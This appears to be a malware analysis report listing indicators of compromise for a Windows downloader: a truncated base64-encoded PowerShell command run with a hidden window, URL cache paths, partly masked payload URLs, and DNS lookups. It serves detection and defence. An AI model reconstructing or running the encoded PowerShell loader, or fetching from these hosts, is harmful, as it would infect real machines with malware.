Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAE8AWgBPAE0AbgB2AG4APQAnAEYATwBQAFQAUgBuAGgAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAUgBJAHQAWQBQAHIATwB0AE8AYABDAG8AbAAiACAAPQAgAC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://sm##ads.eu/images/MxC7g2M0vR/
- http://st###man.com.br/afm/fMm958/
- http://ka##kft.hu/cli/PKgFn76/
- DNS ASK sm##ads.eu
- DNS ASK st###man.com.br
- DNS ASK ma###fama.it
- DNS ASK ka##kft.hu
- DNS ASK lv#.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAE8AWgBPAE0AbgB2AG4APQAnAEYATwBQAFQAUgBuAGgAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAUgBJAHQAWQBQAHIATwB0AE8AYABDAG8AbAAiACAAPQAgAC...' (with hidden window)